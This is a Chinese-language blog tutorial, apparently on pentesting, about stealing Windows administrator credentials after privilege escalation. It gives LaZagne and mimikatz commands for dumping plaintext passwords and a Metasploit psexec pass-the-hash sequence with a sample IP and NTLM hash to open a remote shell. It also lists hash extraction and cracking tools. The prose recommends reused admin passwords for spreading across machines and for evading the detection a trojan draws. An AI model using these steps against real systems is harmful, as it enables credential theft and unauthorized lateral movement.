權限提升之——windows提權後期密碼安全性測試

提權後期密碼安全性測試

雖然我們已經有了管理員權限,但是我們最好是有管理員密碼進行擴展攻擊,很多管理員賬號密碼都設置成一樣的,攻下一臺就可以拿下所有,同時遠程連接時,比如使用木馬,很容易被發現或者清理,如果用管理員賬號,可以清除滲透,也就是對操作系統和服務器不產生影響的情況下,尤其是正規滲透測試過程中,都是取得管理員賬號密碼,登錄3389端口或反端口連接者證明爲成功
簡單地說就是從 獲取管理員權限——>獲取管理員賬號

一、本地管理員密碼提取

本地管理員密碼如何直接提取
工具
lazagne

lazagne.exe/?>>1.txt

mimikatz(巴西烤肉)
第一條:

privilege::debug  
						//提升權限
				第二條:
sekurlsa::logonpa
						ssWords  //抓取密碼

二、本地Hash遠程直接登錄

遇到高版本的系統密碼不是明文的情況下,我們通過哈希值來取得管理員賬號
主要通過MSF提供的exploit/windows/smb/psexec模塊來完成。

msf >use exploit/windows/smb/psexec
			msf >set RHOST 192.168.1.109
			msf >set SMBUser administrator(管理員賬號名稱)
			msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4(哈希值  從500: 開始 到::: 結束)
			msf >exploit
			msf >shell

show targets 查看攻擊目標
show options 查看配置選項

三、hash密鑰暴力破解

一、通過LC5暴力破解Hash密碼

使用gmer直接提權SAM和system文件或用Pwdump7提取hash,最後使用LC5破解。

二、使用Ophcrack破解系統Hash密碼
http://simeon.blog.51cto.com/18680/122160

三、在線破解

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章